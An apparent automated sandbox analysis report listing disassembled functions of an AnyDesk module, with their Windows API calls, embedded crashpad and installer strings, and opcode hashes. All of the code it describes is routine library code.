                                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 69C652F7
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 69C65310
                                                                                                                                                                                                                                                    • Part of subcall function 69C22340: GetLastError.KERNEL32(?,00000000), ref: 69C223D6
                                                                                                                                                                                                                                                    • Part of subcall function 69C66663: GetLastError.KERNEL32(?,000000FF,0000001C,00000001), ref: 69C666A2
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$File$Pointer
                                                                                                                                                                                                                                                  • String ID: expected to start with $DAPC$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc$failed to rewind to write$failed to truncate$failed to write header$failed to write records$failed to write string table
                                                                                                                                                                                                                                                  • API String ID: 4162258135-419746783
                                                                                                                                                                                                                                                  • Opcode ID: fe1071f7c03a3a82caca408ac861fcbd56a83d2a1efcfa52cda1c5ff2a880811
                                                                                                                                                                                                                                                  • Instruction ID: db3f972027df764e666156ab2bd71f300ac2b4336c9c505b4f7c2687e9bacf88
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe1071f7c03a3a82caca408ac861fcbd56a83d2a1efcfa52cda1c5ff2a880811
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CA10475940308AAEB18DB64FC95FEDB379AF04318F209099E508BB1D2FF71AA45CB10
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C26AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: SVWj
                                                                                                                                                                                                                                                  • API String ID: 0-3360714375
                                                                                                                                                                                                                                                  • Opcode ID: 2aedc68cbdc9d45f04a7853b484659a91c7c4cef2259388f1b358b7a7f46808e
                                                                                                                                                                                                                                                  • Instruction ID: 7720cd1074fe7c1fd577a4719d5cccbc7a6c06d911a4c2e6610eae73b0bbd03d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2aedc68cbdc9d45f04a7853b484659a91c7c4cef2259388f1b358b7a7f46808e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0312936A009148FD714DF64F69095E73B4EF40368B5085AADC059B291F731EA42DBE2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C677EB Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 112COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,69C6763E,000000FF,?,?), ref: 69C67814
                                                                                                                                                                                                                                                    • Part of subcall function 69C67928: OutputDebugStringW.KERNEL32(69C7EDD8,?,69C67900,Failed to create directory %ls, last error is %d,?,000000B7), ref: 69C67949
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • install_static::`anonymous-namespace'::RecursiveDirectoryCreate, xrefs: 69C6781C
                                                                                                                                                                                                                                                  • Failed to create directory %ls, last error is %d, xrefs: 69C678F6
                                                                                                                                                                                                                                                  • %hs( %ls directory conflicts with an existing file. ), xrefs: 69C67839
                                                                                                                                                                                                                                                  • %hs( %ls directory exists ), xrefs: 69C67825
                                                                                                                                                                                                                                                  • Failed to create one of the parent directories, xrefs: 69C678BF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesDebugFileOutputString
                                                                                                                                                                                                                                                  • String ID: %hs( %ls directory conflicts with an existing file. )$%hs( %ls directory exists )$Failed to create directory %ls, last error is %d$Failed to create one of the parent directories$install_static::`anonymous-namespace'::RecursiveDirectoryCreate
                                                                                                                                                                                                                                                  • API String ID: 708965821-2569357656
                                                                                                                                                                                                                                                  • Opcode ID: 88436eb92a2fdcbc2866be51c0b296f8a2eebd15e5415008dd800a2139b8db03
                                                                                                                                                                                                                                                  • Instruction ID: ea14809b6cd946ecb61db1a948c69751b38c00500b6986fab0288345b3b560de
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88436eb92a2fdcbc2866be51c0b296f8a2eebd15e5415008dd800a2139b8db03
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E331F434904304ABDF00DAA5FCD5FAE77B8AF47338F605A19E528A71E0FB345906D661
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C3D530 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C3D54D
                                                                                                                                                                                                                                                    • Part of subcall function 69C32A20: GetCurrentProcess.KERNEL32(00000000), ref: 69C32A4E
                                                                                                                                                                                                                                                    • Part of subcall function 69C32A20: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process), ref: 69C32A64
                                                                                                                                                                                                                                                    • Part of subcall function 69C32A20: GetProcAddress.KERNEL32(00000000), ref: 69C32A6B
                                                                                                                                                                                                                                                    • Part of subcall function 69C32A20: GetVersionExW.KERNEL32(0000011C), ref: 69C32AE0
                                                                                                                                                                                                                                                    • Part of subcall function 69C32A20: GetNativeSystemInfo.KERNEL32(?), ref: 69C32B3C
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 69C3D5B7
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitializeProcThreadAttributeList), ref: 69C3D5CB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,UpdateProcThreadAttribute), ref: 69C3D5D8
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DeleteProcThreadAttributeList), ref: 69C3D5E5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • DeleteProcThreadAttributeList, xrefs: 69C3D5DA
                                                                                                                                                                                                                                                  • InitializeProcThreadAttributeList, xrefs: 69C3D5C5
                                                                                                                                                                                                                                                  • kernel32.dll, xrefs: 69C3D5B2
                                                                                                                                                                                                                                                  • UpdateProcThreadAttribute, xrefs: 69C3D5CD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule$CurrentInfoNativeProcessSystemVersion
                                                                                                                                                                                                                                                  • String ID: DeleteProcThreadAttributeList$InitializeProcThreadAttributeList$UpdateProcThreadAttribute$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 4189602493-1491343547
                                                                                                                                                                                                                                                  • Opcode ID: 5ca2af53a3d7b4cef546b81d4a1ac9e116bfa1d01bf10a820b0353755d38b8e6
                                                                                                                                                                                                                                                  • Instruction ID: 11e71bda930b512f61b12353007d38a8b7510ba42f3b4ec629c9b4837032ab70
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ca2af53a3d7b4cef546b81d4a1ac9e116bfa1d01bf10a820b0353755d38b8e6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6511E6B5A063609BEF10DB64AD5076A3EF4ABC7329F90043EE50597240F7784845C7A6
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4FA90 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAA4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: HeapFree.KERNEL32(00000000,00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000), ref: 69C4CBBB
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: GetLastError.KERNEL32(00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000,00000000), ref: 69C4CBCD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAB0
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FABB
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAC6
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAD1
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FADC
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAE7
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAF2
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAFD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FB0B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: 7110a9e48fe4fd9861265fb5d50f395661b49636f0feaab5c646ac3830da9ad4
                                                                                                                                                                                                                                                  • Instruction ID: 67d8e00f68856bc154961c6f625679d32cc3dbc48dd8dc46f9028dd9d64ff89d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7110a9e48fe4fd9861265fb5d50f395661b49636f0feaab5c646ac3830da9ad4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C911B6BA650508BFDF01DF54E880CD93BA5EF44654B01E0A5BE488F271EB32DB589B81
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5C926 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 58652288ce96af1a62123ad052cae5c46b056abac0944fee417654110ea4e2fe
                                                                                                                                                                                                                                                  • Instruction ID: 4193e80e27d434498b7b0a8bd95e6ec8bfe1f03605b831823e96865fc5367804
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58652288ce96af1a62123ad052cae5c46b056abac0944fee417654110ea4e2fe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAC10B74E842499FDF01CFACE840BAD7BB5FF4A324F048158D452AB391E7349961CB65
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5BE3D Relevance: 13.8, APIs: 9, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C5BB7C: CreateFileW.KERNEL32(00000000,00000000,?,69C5BEE6,?,?,00000000,?,69C5BEE6,00000000,0000000C), ref: 69C5BB99
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69C5BF51
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 69C5BF58
                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 69C5BF64
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69C5BF6E
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 69C5BF77
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 69C5BF97
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C5C0E1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C5C113
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 69C5C11A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4237864984-0
                                                                                                                                                                                                                                                  • Opcode ID: 042a36def87d59f97d5e17a9f63c18a03db0e8bfea843ab166aaf4b444cc0dee
                                                                                                                                                                                                                                                  • Instruction ID: 02e363a79685bd8be0d015a97dc362615d0298cba5fb34ad88d3b45252221aaf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 042a36def87d59f97d5e17a9f63c18a03db0e8bfea843ab166aaf4b444cc0dee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94A14436A141588FDF08CF68E851BAE3FB5EB4A324F144159E812EF3D1E7349922CB56
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C577D1 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1282221369-0
                                                                                                                                                                                                                                                  • Opcode ID: d704c7d4f3251b5708e62c412f0976ec02310c6d22c9b93147ba133822eec98d
                                                                                                                                                                                                                                                  • Instruction ID: 88e104d9cbe5e61f78fbcec164aecf444a0a773e4e40b92ce37712b932d83304
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d704c7d4f3251b5708e62c412f0976ec02310c6d22c9b93147ba133822eec98d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2616972A043106FEF11DF69A840AAD7BB4AF02764F00C16DDC56AB281F73286B1D795
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4018B Relevance: 13.7, APIs: 9, Instructions: 200COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?), ref: 69C401D4
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?), ref: 69C40268
                                                                                                                                                                                                                                                  • ___crtCompareStringEx.LIBCPMT ref: 69C40282
                                                                                                                                                                                                                                                  • ___crtCompareStringEx.LIBCPMT ref: 69C402BE
                                                                                                                                                                                                                                                  • ___crtCompareStringEx.LIBCPMT ref: 69C40337
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 69C40352
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C4035F
                                                                                                                                                                                                                                                    • Part of subcall function 69C4C844: HeapAlloc.KERNEL32(00000000,0000010C,00000004,?,69C4C8A7,?,00000000,?,69C57B70,0000010C,00000004,?,0000010C,?,?,69C4DB9D), ref: 69C4C876
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C40372
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C4037D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharCompareMultiStringWide___crt__freea$AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2499053095-0
                                                                                                                                                                                                                                                  • Opcode ID: 7196d144264a6780f3b1b18813a7ba7c393ff23315be2c6d6f46e8b90e478e9d
                                                                                                                                                                                                                                                  • Instruction ID: 59891d077e45d569f2fccbfb0538cd9a58b3f03d6908df84b824fa925f98205a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7196d144264a6780f3b1b18813a7ba7c393ff23315be2c6d6f46e8b90e478e9d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7351D472B90216ABDF11CFA5EC80D9E7FA9FB69B54B008529E914E6150FB34C950CB90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5F383 Relevance: 13.6, APIs: 9, Instructions: 77COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000001,?,00000000,00000000), ref: 69C5F396
                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000), ref: 69C5F3B3
                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 69C5F3CF
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C5F3D5
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C5F3E0
                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 69C5F406
                                                                                                                                                                                                                                                  • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 69C5F420
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C5F43C
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 69C5F443
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Token$CloseErrorHandleInformationLastOpenProcess$ConvertString
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1608810797-0
                                                                                                                                                                                                                                                  • Opcode ID: 40fb57898508f49c6dae011441e10196fcf973624d0b05ee31a9b89965c99345
                                                                                                                                                                                                                                                  • Instruction ID: 7378b08205b37df7a82f71e9f9a2f34651e7e6c413490bfd973d983c8bede6cd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40fb57898508f49c6dae011441e10196fcf973624d0b05ee31a9b89965c99345
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B218E35A40218FFEF019FA6DC89ABE7BBDEF05314F404451F912E2050E7719E62AB61
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C3E6F0 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 349COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 69C3E754
                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?), ref: 69C3E798
